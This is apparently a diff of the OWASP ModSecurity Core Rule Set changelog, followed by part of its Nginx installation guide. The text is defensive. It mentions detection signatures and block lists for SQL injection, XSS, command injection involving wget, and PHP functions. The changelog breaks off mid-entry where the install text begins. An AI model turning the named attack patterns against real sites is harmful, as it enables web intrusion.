+* Added JS Overrides file to identify successful XSS probes
+* Added new XSS Detection Rules from Ashar Javed ()
+ *
+* Updated the SQLi Filters to add in Oracle specific functions
+ *
+
+Bug Fixes:
+
+* Fixed Session Hijacking rules
+ *
+* Fixed bug in XSS rules checking TX:PM_XSS_SCORE variable
+
+## Version 2.2.6 - 2012-09-14
+
+Improvements:
+
+* Started rule formatting update for better readability
+* Added maturity and accuracy action data to each rule
+* Updated rule revision (rev) action
+* Added rule version (ver) action
+* Added more regression tests (util/regression_tests/)
+* Modified Rule ID 960342 to block large file attachments in phase:1
+* Removed all PARANOID rule checks
+* Added new Session Fixation rules
+
+Bug Fixes:
+
+* Fixed missing ending double-quotes in XSS rules file
+* Moved SecDefaultAction setting from phase:2 to phase:1
+* Fixed Session Hijacking SessionID Regex
+
+* Changed the variable listing for many generic attack rules to exclude REQUEST_FILENAME
+
+
+## Version 2.2.5 - 2012-06-14
+
+Security Fixes:
+
+* Updated the anomaly scoring value for rule ID 960000 to critical
+ (Identified by Qualys Vulnerability & Malware Research Labs (VMRL))
+ ()
+* Updated Content-Type check to fix possible evasion with @within
+ (Identified by Qualys Vulnerability & Malware Research Labs (VMRL))
+ ()
+
+Improvements:
+
+* Renamed main config file to modsecurity_crs_10_setup.conf
+* Updated the rule IDs to start from CRS reserved range: 900000
+* Updated rule formatting for readability
+* Updated the CSRF rules to use UNIQUE_ID as the token source
+* Added the zap2modsec.pl script to the /util directory which converts
+ OWASP ZAP Scanner XML data into ModSecurity Virtual Patches
+* Updated the Directory Traversal Signatures to include more obfuscated data
+* Added Arachni Scanner Integration Lua script/rules files
+
+Bug Fixes:
+
+* Added forceRequestBodyVariable action to rule ID 960904
+
+## Version 2.2.4 - 2012-03-14
+
+Improvements:
+
+* Added Location and Set-Cookie checks to Response Splitting rule ID
950910
+* Added a README file to the activated_rules directory
+* Consolidate a number of SQL Injection rules into optimized regexs
+* Removed multiMatch and replaceComments from SQL Injection rules
+* Updated the SQLi regexs for greediness
+* Updated the SQLi setvar anomaly score values to use macro expansion
+* Removed PARANOID mode rules
+
+Bug Fixes:
+
+* Fixed missing comma before severity action in rules 958291, 958230 and 958231
+* Fixed duplidate rule IDs
+
+## Version 2.2.3 - 2011-12-19
+
+Improvements:
+
+* Added Watcher Cookie Checks to optional_rules/modsecurity_crs_55_appication_defects.conf file
+
+* Added Watcher Charset Checks to optional_rules/modsecurity_crs_55_application_defects.conf file
+
+* Added Watcher Header Checks to optional_rules/modsecurity_crs_55_application_defects.conf file
+
+
+Bug Fixes:
+
+* Fixed Content-Type evasion issue by adding ctl:forceRequestBodyVariable action to
+ rule ID 960010. (Identified by Andrew Wilson of Trustwave SpiderLabs).
+* Updated the regex and added tags for RFI rules.
+
+## Version 2.2.2 - 2011-09-28
+
+Improvements:
+
+* Updated the AppSensor Profiling (to use Lua scripts) for Request Exceptions Detection Points
+* Added new Range header detection checks to prevent Apache DoS
+* Added new Security Scanner User-Agent strings
+* Added example script to the /util directory to convert Arachni DAST scanner
+ XML data into ModSecurity virtual patching rules.
+* Updated the SQLi Character Anomaly Detection Rules
+* Added Host header info to the RESOURCE collection key for AppSensor profiling rules
+
+Bug Fixes:
+
+* Fixed action list for XSS rules (replaced pass,nolog,auditlog with block)
+* Fixed Request Limit rules by removing & from variables
+* Fixed Session Hijacking IP/UA hash captures
+* Updated the SQLi regex for rule ID 981242
+
+## Version 2.2.1 - 2011-07-20
+
+Improvements:
+
+* Extensive SQL Injection signature updates as a result of the SQLi Challenge
+
+* Updated the SQL Error message detection in response bodies
+* Updated SQL Injection signatures to include more DB functions
+* Updated the WEAK SQL Injection signatures
+* Added tag AppSensor/RE8 to rule ID 960018
+
+Bug Fixes:
+
+* Fixed Bad Robot logic for rule ID 990012 to further qualify User-Agent matches
+
+* Fixed Session Hijacking rules to properly capture IP address network hashes.
+* Added the multiMatch action to the SQLi rules
+* Fixed a false negative logic flaw within the advanced_filter_converter.lua script
+* Fixed missing : in id action in DoS ruleset.
+* Updated rule ID 971150 signature to remove ;
+
+## Version 2.2.0 - 2011-05-26
+
+Improvements:
+
+* Changed Licensing from GPLv2 to Apache Software License v2 (ASLv2)
+
+* Created new INSTALL file outlining quick config setup
+* Added a new rule regression testing framework to the /util directory
+* Added new activated_rules directory which will allow users to place symlinks pointing
+ to files they want to run.
This allows for easier Apache Include wild-carding
+* Adding in new RULE_MATURITY and RULE_ACCURACY tags
+* Adding in a check for X-Forwarded-For source IP when creating IP collection
+* Added new Application Defect checks (55 app defect file) from Watcher tool (Check Charset)
+
+* Added new AppSensor rules to experimental_dir
+
+* Added new Generic Malicious JS checks in outbound content
+* Added experimental IP Forensic rules to gather Client hostname/whois info
+
+* Added support for Mozilla's Content Security Policy (CSP) to the experimental_rules
+
+* Global collection in the 10 file now uses the Host Request Header as the collection key.
+ This allows for per-site global collections.
+* Added new SpiderLabs Research (SLR) rules directory (slr_rules) for known vulnerabilities.
+ This includes both converted web rules from Emerging Threats (ET) and from SLR Team.
+* Added new SLR rule packs for known application vulns for WordPress, Joomla and phpBB
+* Added experimental rules for detecting Open Proxy Abuse
+
+* Added experimental Passive Vulnerability Scanning ruleset using OSVDB and Lua API
+
+* Added additional URI Request Validation rule to the 20 protocol violations file (Rule ID - 981227)
+* Added new SQLi detection rules (959070, 959071 and 959072)
+* Added "Toata dragostea mea pentru diavola" to the malicious User-Agent data
+
+
+Bug Fixes:
+
+* Assigned IDs to all active SecRules/SecActions
+* Removed rule inversion (!) from rule ID 960902
+* Fixed false negative issue in Response Splitting Rule
+* Fixed false negative issue with @validateByteRange check
+* Updated the TARGETS listing for rule ID 950908
+* Updated TX data for REQBODY processing
+* Changed the pass action to block in the RFI rules in the 40 generic file
+* Updated RFI regex to catch IP address usage in hostname
+
+* Changed REQUEST_URI_RAW variable to REQUEST_LINE in SLR rules to allow matches on request methods.
+* Updated the RFI rules in the 40 generic attacks conf file to remove explicit logging actions.
+ They will now inherit the settings from the SecDefaultAction
+
+## Version 2.1.2 - 2011-02-17
+
+Improvements:
+
+* Added experimental real-time application profiling ruleset.
+* Added experimental Lua script for profiling the # of page scripts, iframes, etc..
+ which will help to identify successful XSS attacks and planting of malware links.
+* Added new CSRF detection rule which will trigger if a subsequent request comes too
+ quickly (need to use the Ignore Static Content rules).
+
+Bug Fixes:
+
+* Added missing " in the skipAfter SecAction in the CC Detection rule set
+
+## Version 2.1.1 - 2010-12-30
+
+Bug Fixes:
+
+* Updated the 10 config conf file to add in pass action to User-Agent rule
+* Updated the CSRF ruleset to conditionally do content injection - if the
+ csrf token was created by the session hijacking conf file
+* Updated the session hijacking conf file to only enforce rules if a SessionID
+ Cookie was submitted
+* Fixed macro expansion setvar bug in the restricted file extension rule
+* Moved the comment spam data file into the optional_rules directory
+
+## Version 2.1.0 - 2010-12-29
+
+Improvements:
+
+* Added Experimental Lua Converter script to normalize payloads. Based on
+ PHPIDS Converter code and it used with the advanced filters conf file.
+* Changed the name of PHPIDS converted rules to Advanced Filters
+* Added Ignore Static Content (Performance enhancement) rule set
+* Added XML Enabler (Web Services) rule set which will parse XML data
+* Added Authorized Vulnerability Scanning (AVS) Whitelist rule set
+* Added Denial of Service (DoS) Protection rule set
+* Added Slow HTTP DoS (Connection Consumption) Protection rule set
+* Added Brute Force Attack Protection rule set
+* Added Session Hijacking Detection rule set
+* Added Username Tracking rule set
+* Added Authentication Tracking rule set
+* Added Anti-Virus Scanning of File Attachments rule set
+* Added AV Scanning program to /util directory
+* Added Credit Card Usage Tracking/Leakage Prevention rule set
+* Added experimental CC Track/PAN Leakage Prevention rule set
+* Added an experimental_rules directory to hold new BETA rules
+* Moved the local exceptions conf file back into base_rules directory however
+ it has a ".example" extension to prevent overwriting customized versions
+ when upgrading
+* Separated out HTTP Parameter Pollution and Restricted Character Anomaly Detection rules to
+ the experimental_rules directory
+* Adding the REQUEST_HEADERS:User-Agent macro data to the initcol in 10 config file, which will
+ help to make collections a bit more unique
+
+## Version 2.0.10 - 2010-11-29
+
+Improvements:
+
+* Commented out the Anomaly Scoring Blocking Mode TX variable since, by default, the CRS
+ is running in traditional mode.
+
+Bug Fixes:
+
+* Moved all skipAfter actions in chained rules to chain starter SecRules
+
+* Changed phases on several rules in the 20 protocol anomaly rules file to phase:1 to avoid FNs
+
+## Version 2.0.9 - 2010-11-17
+
+Improvements:
+
+* Changed the name of the main config file to modsecurity_crs_10_config.conf.example so that
+ it will not overwrite existing config settings. Users should rename this file to activate
+ it.
+* Traditional detection mode is now the current default
+* Users can now more easily toggle between traditional/standard mode vs. anomaly scoring mode
+ by editing the modsecurity_crs_10_config.conf file
+* Updated the disruptive actions in most rules to use "block" action instead of "pass". This
+ is to allow for the toggling between traditional vs. anomaly scoring modes.
+* Removed logging actions from most rules so that it can be controlled from the SecDefaultAction
+ setting in the modsecurity_crs_10_config.conf file
+* Updated the anomaly scores in the modsecurity_crs_10_config.conf file to more closely match
+ what is used in the PHPIDS rules. These still have the same factor of severity even though
+ the numbers themselves are smaller.
+* Updated the 49 and 59 blocking rules to include the matched logdata
+* Updated the TAG data to further classify attack/vuln categories.
+* Updated the SQL Injection filters to detect more boolean logic attacks
+* Moved some files to optional_rules directory (phpids, Emerging Threats rules)
+
+Bug Fixes:
+
+* Fixed Rule ID 960023 in optional_rules/modsecurity_crs_40_experimental.conf is missing 1 single quote
+
+* Moved all skipAfter actions in chained rules to the rule starter line (must have ModSec v2.5.13 or higher)
+
+* Fixed restricted file extension bug with macro expansion
+
+* Updated the SQLI TX variable macro expansion data in the 49 and 60 files so that
+ it matches what is being set in the sql injection conf file
+* Fixed typo in SQL Injection regexs - missing backslash for word boundary (b)
+
+
+## Version 2.0.8 - 2010-08-27
+
+Improvements:
+
+* Updated the PHPIDS filters
+* Updated the SQL Injection filters to detect boolean attacks (1<2, foo == bar, etc..)
+* Updated the SQL Injection filters to account for different quotes
+* Added UTF-8 encoding validation support to the modsecurity_crs_10_config.conf file
+* Added Rule ID 950109 to detect multiple URL encodings
+* Added two experimental rules to detect anomalous use of special characters
+
+Bug Fixes:
+
+* Fixed Encoding Detection RegEx (950107 and 950108)
+* Fixed rules-updater.pl script to better handle whitespace
+
+* Fixed missing pass action bug in modsecurity_crs_21_protocol_anomalies.conf
+
+* Fixed the anomaly scoring in the modsecurity_crs_41_phpids_filters.conf file
+
+* Updated XSS rule id 958001 to improve the .cookie regex to reduce false positives
+
+
+## Version 2.0.7 - 2010-06-04
+
+Improvements:
+
+* Added CSRF Protection Ruleset which will use Content Injection to add javascript to
+ specific outbound data and then validate the csrf token on subsequent requests.
+* Added new Application Defect Ruleset which will identify/fix missing HTTPOnly cookie
+ flags
+* Added Experimental XSS/Missing Output Escaping Ruleset which looks for user supplied
+ data being echoed back to user unchanged.
+* Added rules-updater.pl script and configuration file to allow users to automatically
+ download CRS rules from the CRS rules repository.
+* Added new SQLi keyword for ciel() and reverse() functions.
+* Updated the PHPIDS filters
+
+Bug Fixes:
+
+* Fixed false positives for Request Header Name matching in the 30 file by
+ adding boundary characters.
+* Added missing pass actions to @pmFromFile prequalifier rules
+* Added backslash to SQLi regex
+
+* Fixed hard coded anomaly score in PHPIDS filter file
+
+* Fixed restricted_extension false positive by adding boundary characters
+
+## Version 2.0.6 - 2010-02-26
+
+Bug Fixes:
+
+* Added missing transformation functions to SQLi rules.
+
+* Fixed duplicate rule IDs.
+
+* Fixed typo in @pmFromFile in the Comment SPAM rules
+
+* Added macro expansion to Restricted Headers rule
+
+* Fixed misspelled SecMarker
+
+* Fixed missing chain action in Content-Type header check
+
+* Update phpids filters to use pass action instead of block
+
+## Version 2.0.5 - 2010-02-01
+
+Improvements:
+
+* Removed previous 10 config files as they may conflict with local customized Mod configs.
+* Added a new 10 config file that allows the user to globally set TX variables to turn on/off
+ PARANOID_MODE inspection, set anomaly score levels and http policies.
+ Must have ModSecurity 2.5.12 to use the macro expansion in numeric operators.
+* Added Rule Logic and Reference links to rules descriptions.
+* Added Rule IDs to all rules.
+* Added tag data mapping to new OWASP Top 10 and AppSensor Projects, WASC Threat Classification
+* Removed Apache limit directives from the 23 file
+* Added macro expansion to 23 file checks.
+* Added @pmFromFile check to 35 bad robots file
+* Added malicious UA strings to 35 bad robots check
+* Created an experimental rules file
+* Updated HTTP Parameter Pollution (HPP) rule logic to concat data into a TX variable for inspection
+* Removed TX inspections for generic attacks and reverted to standard ARGS inspection
+
+* Updated the variable list for standard inspections (ARGS|ARGS_NAMES|XML:/*) and moved the other
+ variables to the PARANOID list (REQUEST_URI|REQUEST_BODY|REQUEST_HEADERS|TX:HPP_DATA)
+* Moved converted ET Snort rules to the /optional_rules directory
+* Created a new Header Tagging ruleset (optional_rules) that will add matched rule data to the
+ request headers.
+* Updated Inbound blocking conf file to use macro expansion from the 10 config file settings
+* Added separate anomaly scores for inbound, outbound and total to be evaluated for blocking.
+* Updated the regex logic in the (1=1) rule to factor in quotes and other logical operators.
+* Updated the SPAMMER RBL check rules logic to only check once per IP/Day.
+* Added new outbound malware link detection rules.
+* Added PHP "call_user_func" to blacklist
+ Identified by SOGETI ESEC R&D
+
+Bug Fixes:
+
+* Removed Non-numeric Rule IDs
+
+* Updated the variable list on SQLi rules.
+* Fixed outbound @pmFromFile action from allow to skipAfter to allow for outbound anomaly scoring
+ and blocking
+
+## Version 2.0.4 - 2009-11-30
+
+Improvements:
+
+* Updated converted PHPIDS signatures ()
+* Updated PHPIDS rules logic to first search for payloads in ARGS and then if there is no match found
+ then search more generically in request_body|request_uri_raw
+* Updated PHPIDS rules logic to only set TX variables and to not log. This allows for more clean
+ exceptions in the 48 file which can then expire/delete false positive TX matches and adjust the
+ anomaly scores. These rules will then inspect for any TX variables in phase:5 and create appropriate
+ alerts for any variable matches that exist.
+
+Bug Fixes:
+
+* Added Anomaly Score check to the 60 correlation file to recheck the anomaly score at the end of
+ phase:4 which would allow for blocking based on information leakage issues.
+
+## Version 2.0.3 - 2009-11-05
+
+Improvements:
+
+* Updated converted PHPIDS signatures ()
+* Create a new PHPIDS Converter rules file ()
+* Added new rules to identify multipart/form-data bypass attempts
+* Increased anomaly scoring (+100) for REQBODY_PROCESSOR_ERROR alerts
+
+Bug Fixes:
+
+* Added t:urlDecodeUni transformation function to phpids rules to fix both false positives/negatives
+
+* Added new variable locations to the phpids filters
+
+* Use of transformation functions can cause false negatives - added multiMatch action to phpids rules
+
+* Fixed multipart parsing evasion issues by adding strict parsing rules
+
+* Fixed typo in xss rules (missing |)
+
+* Fixed regex text in IE8 XSS filters (changed to lowercase)
+
+
+## Version 2.0.2 - 2009-09-11
+
+Improvements:
+
+* Added converted PHPIDS signatures ()
+
+
+Bug Fixes:
+
+* Rule 958297 - Fixed Comment SPAM UA false positive that triggered only on mozilla.
+
+
+## Version 2.0.1 - 2009-08-07
+
+Improvements:
+
+* Updated the transformation functions used in the XSS/SQLi rules to improve performance
+
+
+* Updated the variable/target list in the XSS rules
+
+
+* Added XSS Filters from IE8
+
+
+Bug Fixes:
+
+* Rule 958297 - Fixed unescaped double-quote issue in Comment SPAM UA rule.
+
+
+## Version 2.0.0 - 2009-07-29
+
+New Rules & Features:
+
+* Fine Grained Policy
+ The rules have been split to having one signature per rule instead of having
+ all signatures combined into one optimized regular expression.
+ This should allow you to modify/disable events based on specific patterns
+ instead of having to deal with the whole rule.
+* Converted Snort Rules
+ Emerging Threat web attack rules have been converted.
+
+* Anomaly Scoring Mode Option
+ The rules have been updated to include anomaly scoring variables which allow
+ you to evaluate the score at the end of phase:2 and phase:5 and decide on what
+ logging and disruptive actions to take based on the score.
+* Correlated Events
+ There are rules in phase:5 that will provide some correlation between inbound
+ events and outbound events and will provide a result of successful atttack or
+ attempted attack.
+* Updated Severity Ratings
+ The severity ratings in the rules have been updated to the following:
+ * 0: Emergency - is generated from correlation where there is an inbound attack and
+ an outbound leakage.
+ * 1: Alert - is generated from correlation where there is an inbound attack and an
+ outbound application level error.
+ * 2: Critical - is the highest severity level possible without correlation. It is
+ normally generated by the web attack rules (40 level files).
+ * 3: Error - is generated mostly from outbound leakabe rules (50 level files).
+ * 4: Warning - is generated by malicious client rules (35 level files).
+ * 5: Notice - is generated by the Protocol policy and anomaly files.
+ * 6: Info - is generated by the search engine clients (55 marketing file).
+* Updated Comment SPAM Protections
+ Updated rules to include RBL lookups and client fingerprinting concepts from
+ Bad Behavior ()
+* Creation of Global Collection
+ Automatically create a Global collection in the _10_ config file. Other rules
+ can then access it.
+* Use of Block Action
+ Updated the rules to use the "block" action. This allows the Admin to globally
+ set the desired block action once with SecDefaultAction in the _10_ config file
+ rather than having to edit the disruptive actions in all of the rules or for
+ the need to have multiple versions of the rules (blocking vs. non-blocking).
+* "Possible HTTP Parameter Pollution Attack: Multiple Parameters with the same Name."
+
+* Added new generic RFI detection rules.
+
+* "Possibly malicious iframe tag in output" (Rules 981001,981002)
+ Planting invisible iframes in a site can be used by attackers to point users
+ from the victim site to their malicious site.
This is actually as if the
+ user was visiting the attacker's site himself, causing the user's browser to
+ process the content in the attacker's site.
+
+New Events:
+
+* Rule 960019 - Expect Header Not Allowed.
+* Rule 960020 - Pragma Header Requires Cache-Control Header
+* Rule 958290 - Invalid Character in Request - Browsers should not send the (#) character
+ as it is reserved for use as a fragment identifier within the html page.
+* Rule 958291 - Range: field exists and begins with 0.
+* Rule 958292 - Invalid Request Header Found.
+* Rule 958293 - Lowercase Via Request Header Found.
+* Rule 958294 - Common SPAM Proxies found in Via Request Header.
+* Rule 958295 - Multiple/Conflicting Connection Header Data Found.
+* Rule 958296 - Request Indicates a SPAM client accessed the Site.
+* Rule 958297 - Common SPAM/Email Harvester crawler.
+* Rule 958298 - Common SPAM/Email Harvester crawler
+
+Bug Fixes:
+
+* Rule 950107 - Split the rule into 2 separate rules to factor in the
+ Content-Type when inspecting the REQUEST_BODY variable.
+* Rule 960017 - Bug fix for when having port in the host header.
+* Rule 960014 - Bug fix to correlate the SERVER_NAME variable.
+* Rule 950801 - Increased the logic so that the rule will only run if the web site
+ uses UTF-8 Encoding.
+* Rules 999210,999211 - Bug fix to move ctl actions to last rule, add OPTIONS and
+ allow the IPv6 loopback address
+* Rule 950117 - Updated the RFI logic to factor in both a trailing "?" in the ARG
+ and to identify offsite hosts by comparing the ARG URI to the Host
+ header. Due to this rule now being stronger, moved it from optional
+ tight security rule to _40_ generic attacks file.
+
+Other Fixes:
+
+* Added more HTTP Protocol violations to _20_ file.
+* Set the SecDefaultAction in the _10_ config file to log/pass (This was the
+ default setting, however this sets it explicitly.
+* Added SecResponseBodyLimitAction ProcessPartial to the _10_ config file.
This
+ was added so that when running the SecRuleEngine in DetectionOnly mode, it will
+ not deny response bodies that go over the size restrictions.
+* Changed SecServerSignature to "Apache/1.3.28"
+* Fixed the use of SkipAfter and SecMarkers to make it consistent. Now have
+ BEGIN and END SecMarkers for rule groups to more accurately allow moving to
+ proper locations.
+* Fixed the @pm/@pmFromFile pre-qualifier logic to allow for operator inversion.
+ This removes the need for some SecAction/SkipAfter rules.
+* Updated rule formatting to easily show rule containers (SecMarkers, pre-qualifier
+ rules and chained rules).
+
+## Version 1.6.1 - 2008-04-22
+
+* Fixed a bug where phases and transformations where not specified explicitly
+ in rules. The issue affected a significant number of rules, and we strongly
+ recommend to upgrade.
+
+## Version 1.6.0 - 2008-02-19
+
+New Rulesets & Features:
+
+* 42 - Tight Security
+ This ruleset contains currently 2 rules which are considered highly prone
+ to FPs. They take care of Path Traversal attacks, and RFI attacks. This
+ ruleset is included in the optional_rulesets dir
+* 42 - Comment Spam
+ Comment Spam is used by the spammers to increase their rating in search
+ engines by posting links to their site in other sites that allow posting
+ of comments and messages. The rules in this ruleset will work against that.
+ (Requires ModSecurity 2.5)
+* Tags
+ A single type of attack is often detected by multiple rules. The new alert
+ classification tags solve this issue by providing an alternative alert type
+ indication and can serve for filtering and analysis of audit logs.
+ The classification tags are hierarchical with slashes separating levels.
+ Usually there are two levels with the top level describing the alert group
+ and the lower level denoting the alert type itself, for example:
+ WEB_ATTACK/SQL_INJECTION.
+
+False Positives Fixes:
+
+* Rule 960903 - Moved to phase 4 instead of 5 to avoid FPs
+* Rule 950107 - Will look for invalid url decoding in variables that are not
+ automatically url decoded
+
+Additional rules logic:
+
+* Using the new "logdata" action for logging the matched signature in rules
+* When logging an event once, init the collection only if the alert needs to log
+* Using the new operator @pm as a qualifier before large rules to enhance
+ performance (Requires ModSecurity 2.5)
+* SQL injection - A smarter regexp is used to detect 1=1,2=2,etc.. and not
+ only 1=1. (Thanks to Marc Stern for the idea)
+* New XSS signatures - iframe & flash XSS
+
+## Version 1.5.1 - 2007-12-06
+
+False Positives Fixes:
+
+* Protocol Anomalies (file 21) - exception for Apache SSL pinger (Request: GET /)
+
+New Events:
+
+* 960019 - Detect HTTP/0.9 Requests
+ HTTP/0.9 request are not common these days. This rule will log by default,
+ and block in the blocking version of file 21
+
+Other Fixes:
+
+* File 40, Rules 950004,950005 - Repaired the correction for the double
+ url decoding problem
+* File 55 contained empty regular expressions. Fixed.
+
+## Version 1.5 - 2007-11-23
+
+New Rulesets:
+
+* 23 - Request Limits
+ "Judging by appearances". This rulesets contains rules blocking based on
+ the size of the request, for example, a request with too many arguments
+ will be denied.
+
+Default policy changes:
+
+* XML protection off by default
+* BLOCKING dir renamed to optional_rules
+* Ruleset 55 (marketing) is now optional (added to the optional_rules dir)
+* Ruleset 21 - The exception for apache internal monitor will not log anymore
+
+New Events:
+
+* 960912 - Invalid request body
+ Malformed content will not be parsed by modsecurity, but still there might
+ be applications that will parse it, ignoring the errors.
+* 960913 - Invalid Request
+ Will trigger a security event when request was rejected by apache with
+ code 400, without going through ModSecurity rules.
+ +Additional rules logic: + +* 950001 - New signature: delete from +* 950007 - New signature: waitfor delay + +False Positives Fixes: + +* 950006 - Will not be looking for /cc pattern in User-Agent header +* 950002 - "Internet Explorer" signature removed +* Double decoding bug used to cause FPs. Some of the parameters are already + url-decoded by apache. This caused FPs when the rule performed another + url-decoding transformation. The rules have been split so that parameters + already decoded by apache will not be decoded by the rules anymore. +* 960911 - Expression is much more permissive now +* 950801 - Commented out entirely. NOTE: If your system uses UTF8 encoding, + then you should uncomment this rule (in file 20) + +version 1.4.3 - 2007-07-21 + +New Events: + +* 950012 - HTTP Request Smuggling + For more info on this attack: + +* 960912 - Invalid request body + Malformed content will not be parsed by modsecurity, but still there might + be applications that will parse it, ignoring the errors. +* 960913 - Invalid Request + Will trigger a security event when request was rejected by apache with + code 400, without going through ModSecurity rules. + +False Positives Fixes: + +* 950107 - Will allow a % sign in the middle of a string as well +* 960911 - A more accurate expression based on the rfc: + +* 950015 - Will not look for http/ pattern in the request headers + +Additional rules logic: + +* Since Apache applies scope directives only after ModSecurity phase 1 + this directives cannot be used to exclude phase 1 rules. Therefore + we moved all inspection rules to phase 2. + +version 1.4 build 2 - 2007-05-17 + +New Feature: + +* Search for signatures in XML content + XML Content will be parsed and ispected for signatures + +New Events: + +* 950116 - Unicode Full/Half Width Abuse Attack Attempt + Full-width unicode can by used to bypass content inspection. 
Such encoding will be forbidden + +* 960911 - Invalid HTTP request line + Enforce request line to be valid, i.e.: ` ` +* 960904 - Request Missing Content-Type (when there is content) + When a request contains content, the content-type must be specified. If not, the content will not be inspected +* 970018 - IIS installed in default location (any drive) + Log once if IIS in installed in the /Inetpub directory (on any drive, not only C) +* 950019 - Email Injection + Web forms used for sending mail (such as "tell a friend") are often manipulated by spammers for sending anonymous emails + +Regular expressions fixes: + +* Further optimization of some regular expressions (using the non-greediness operator) + The non-greediness operator, , prevents excessive backtracking + +FP fixes: + +* Rule 950107 - Will allow a parameter to end in a % sign from now on + +version 1.4 - 2007-05-02 + +New Events: + +* 970021 - WebLogic information disclosure + Matching of `"JSP compile error"` in the response body, will trigger this rule, with severity 4 (Warning) +* 950015,950910,950911 - HTTP Response Splitting + Looking for HTTP Response Splitting patterns as described in Amit Klein's excellent white paper: + +ModSecurity does not support compressed content at the moment. Thus, the following rules have been added: +* 960902 - Content-Encoding in request not supported + Any incoming compressed request will be denied +* 960903 - Content-Encoding in response not supported + An outgoing compressed response will be logged to alert, but ONLY ONCE. + +False Positives Fixes: + +* Removed <.exe>,<.shtml> from restricted extensions +* Will not be looking for SQL Injection signatures ``,`` in the Via request header +* Excluded Referer header from SQL injection, XSS and command injection rules +* Excluded X-OS-Prefs header from command injection rule +* Will be looking for command injection signatures in + REQUEST_COOKIES|REQUEST_COOKIES_NAMES instead of REQUEST_HEADERS:Cookie. 
+* Allowing charset specification in the Content-Type + +Additional rules logic: + +* Corrected match of OPTIONS method in event 960015 +* Changed location for event 960014 (proxy access) to REQUEST_URI_RAW +* Moved all rules apart from method inspection from phase 1 to phase 2 - + This will enable viewing content if such a rule triggers as well as setting + exceptions using Apache scope tags. +* Added match for double quote in addition to single quote for `` signature (SQL Injection) +* Added 1=1 signature (SQL Injection) + +version 1.3.2 build 4 2007-01-17 + +Fixed apache 2.4 dummy requests exclusion +Added persistent PDF UXSS detection rule + +## Version 1.3.2 build 3 2007-01-10 + +Fixed regular expression in rule 960010 (file #30) to allow multipart form data +content + +## Version 1.3.2 - 2006-12-27 + +New events: + +* 960037 Directory is restricted by policy +* 960038 HTTP header is restricted by policy + +Regular expressions fixes: + +* Regular expressions with @ at end of beginning (for example "@import) +* Regular expressions with un-escaped "." +* Command Injections now always require certain characters both before and after the command. Important since many are common English words (finger, mail) +* The command injection wget is not searched in the UA header as it has different meaning there. +* LDAP Fixed to reduce FPs: + * More accurate regular expressions + * high bit characters not accpeted between signature tokens. +* Do not detect + Include modsecurity.d/owasp-modsecurity-crs/crs-setup.conf + Include modsecurity.d/owasp-modsecurity-crs/rules/*.conf + + ``` + 8. Restart web server and ensure it starts without errors + 9. Make sure your web sites are still running fine. + 10. Proceed to the section "Testing the Installation" below. + +Installing on Nginx +------------------- + 1. Compile ModSecurity into Nginx + 2. Ensure that ModSecurity is loading correctly by checking error.log + at start up for lines indicating ModSecurity is installed. 
An example + might appear as follows: + ```ModSecurity for nginx (STABLE)/2.9.1 (http://www.modsecurity.org/) configured.``` + 3. The most common method of deploying ModSecurity we have seen is + to create a new folder underneath the Nginx directory (typically + /usr/local/nginx/conf/). Often this folder + is called 'owasp-modsecurity-crs'. Create this folder and cd into it. + 4. Download our release from https://coreruleset.org/installation/ + and unpack it into a new owasp-modsecurity-crs folder. + 5. Move the crs-setup.conf.example file to crs-setup.conf. + Please take this time to go through this + file and customize the settings for your local environment. Failure to + do so may result in false negatives and false positives. See the + section entitled OWASP CRS Configuration for more detail. + 6. Rename rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example and + rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example to remove the + '.example' extension. This will allow you to add exceptions without updates + overwriting them in the future. + 7. Nginx requires the configuration of a single ModSecurity + configuration file within the nginx.conf file using the + 'ModSecurityConfig' directive (when using ModSecurity 2.x). + Best practice is to set 'ModSecurityConfig' to a file from + which you will include your other ModSecurity configuration + files. In this example we will use: + ```ModSecurityConfig modsec_includes.conf;``` + 7. 
Within modsec_includes.conf create your includes to the + CRS folder similar to as follows (The modsecurity.conf file from the + ModSecurity installation is included in this example): + ``` + include modsecurity.conf + include owasp-modsecurity-crs/crs-setup.conf + include owasp-modsecurity-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf + include owasp-modsecurity-crs/rules/REQUEST-901-INITIALIZATION.conf + include owasp-modsecurity-crs/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf + include owasp-modsecurity-crs/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf + include owasp-modsecurity-crs/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf + include owasp-modsecurity-crs/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf + include owasp-modsecurity-crs/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf + include owasp-modsecurity-crs/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf + include owasp-modsecurity-crs/rules/REQUEST-905-COMMON-EXCEPTIONS.conf + include owasp-modsecurity-crs/rules/REQUEST-910-IP-REPUTATION.conf + include owasp-modsecurity-crs/rules/REQUEST-911-METHOD-ENFORCEMENT.conf + include owasp-modsecurity-crs/rules/REQUEST-912-DOS-PROTECTION.conf + include owasp-modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf + include owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf + include owasp-modsecurity-crs/rules/REQUEST-921-PROTOCOL-ATTACK.conf + include owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf + include owasp-modsecurity-crs/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf + include owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf + include owasp-modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf + include owasp-modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf + include owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf + include owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf + include 
